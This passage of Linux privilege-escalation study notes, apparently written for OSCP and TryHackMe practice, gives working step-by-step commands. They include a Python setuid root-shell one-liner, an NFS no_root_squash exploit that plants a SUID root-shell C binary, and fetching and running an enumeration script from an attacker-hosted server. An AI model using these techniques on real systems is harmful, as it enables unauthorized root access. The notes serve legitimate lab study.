step2. /usr/bin/python2.6 -c 'import os; os.setuid(0); os.system("/bin/bash")'

we are root.

note : an interpreter that can setuid(0) is as good as a root shell. Other capabilities to look for are cap_dac_read_search / cap_dac_override (read, or write, any file regardless of permissions) and cap_sys_admin.
For some examples:

https://book.hacktricks.xyz/linux-hardening/privilege-escalation/linux-capabilities

Linux Privilege Escalation using Capabilities - https://www.hackingarticles.in/linux-privilege-escalation-using-capabilities/

SUID vs Capabilities - https://mn3m.info/posts/suid-vs-capabilities/

Linux Capabilities Privilege Escalation - https://medium.com/@int0x33/day-44-linux-capabilities-privilege-escalation-via-openssl-with-selinux-enabled-and-enforced-74d2bec02099

21. NFS Root Squashing

step1. cat /etc/exports

identify an export with the no_root_squash option.

Normally NFS maps a remote root to nobody (root squashing). With no_root_squash, a remote root that mounts the share keeps uid 0 on it: it can create any file as root and leave SUID binaries behind for local users to execute.

step2. on the attacker machine:

showmount -e <target_ip>

lists the exports, e.g. the /mnt/sharedfolder share and which hosts may mount it (* = anyone).

we can mount /mnt/sharedfolder.

on Kali (as root):

step3. mkdir /tmp/mountme

step4. mount -o rw,vers=2 <target_ip>:/mnt/sharedfolder /tmp/mountme

(if vers=2 is refused, try vers=3.) We have mounted the folder.

Now we create a malicious C file on our side.

step5. echo '#include <stdlib.h>
#include <unistd.h>
int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > /tmp/mountme/x.c

step6. gcc /tmp/mountme/x.c -o /tmp/mountme/x

(ignore the warnings; the binary must match the target's architecture and run against its libc, so build it on the target side or add -static if that is a problem)

step7. chmod +s /tmp/mountme/x (we are root on the share, so the file is owned by root and the bit sticks)

step8. on the victim machine:

cd /mnt/sharedfolder

step9. ./x

Network File System (NFS) is a protocol that lets users access files over a network much as they would local storage. It builds on the Open Network Computing Remote Procedure Call (ONC RPC) system. If misconfigured, it can let regular users escalate to root.

Once an attacker has a foothold on a server running a misconfigured NFS service, they can escalate by exploiting the vulnerable shares. The configuration is in /etc/exports.

To exploit a vulnerable share, a binary is placed on it from the attacker machine so that the SUID bit can be set on it as root. The share must not be mounted with nosuid on the target, or the bit is ignored.

NFS listens on port 2049.

showmount shows mount information about an NFS server; -e shows the export list.

Note: no_root_squash means that as the remote root you keep root on the share, so everything done above on the mount was done as root.

22. Docker

step1. attacker machine

cd /transfer

step2. python3 -m http.server 80 (python -m SimpleHTTPServer 80 on Python 2)

step3. victim machine

cd /tmp
step4. wget http://10.10.10.10/linenum.sh

step5. chmod +x linenum.sh

step6. ./linenum.sh

Check whether Docker is installed and whether we are a member of the docker group (membership is equivalent to root, since we can mount the host filesystem into a container).

step7. gtfobins → docker → shell

step8. run the listed command with bash in place of sh to get a root shell on the host

23. Privilege Escalation via lxd

https://www.hackingarticles.in/lxd-privilege-escalation/

24. Other simulations

you might need to do port forwarding for PE (see the Pandora box notes).

Resources:

1. TCM Security Linux Privilege Escalation
2. https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Privilege%20Escalation.md#scheduled-tasks
3. https://www.linkedin.com/pulse/linux-privilege-escalation-techniques-zakwan-abid/
4. THM's Linux Privilege Escalation room
5. https://book.hacktricks.xyz/linux-hardening/privilege-escalation/
6. https://www.studocu.com/uk/document/european-university-ukraine/data-structure/linux-privilege-escalation-methodologysadffdasfsfsdfsdfsdfsdfssdf-shdgfs/24951055
7. https://macrosec.tech/index.php/2021/06/08/linux-privilege-escalation-techniques-using-suid/
8. https://linux.die.net/man/7/capabilities
9. Linux Privilege Escalation using Capabilities - https://www.hackingarticles.in/linux-privilege-escalation-using-capabilities/
10. SUID vs Capabilities - https://mn3m.info/posts/suid-vs-capabilities/
11. Linux Capabilities Privilege Escalation - https://medium.com/@int0x33/day-44-linux-capabilities-privilege-escalation-via-openssl-with-selinux-enabled-and-enforced-74d2bec02099
12. Kayhan Kirbas's course on Udemy (Turkish): https://www.udemy.com/course/privilege-escalation-2-gnu-linux/
13. Basic Linux Privilege Escalation - https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
14. Sushant 747's Guide (country dependent - may need VPN) - https://sushant747.gitbooks.io/total-oscp-guide/content/privilegeescalation-_linux.html
15. https://github.com/Gr1mmie/Linux-Privilege-Escalation-Resources
16. https://f1uffygoat.com/privesc/
17. https://steflan-security.com/linux-privilege-escalation-exploiting-user-defined-functions/

Suggested TryHackMe rooms:

1. simple ctf
2. sudo security bypass
3. sudo buffer overflow
4. cmess
5. ultratech
6. vulnversity
7. lazy admin
8. anonymous
9. tomghost
10. convert my video
11. brainpan
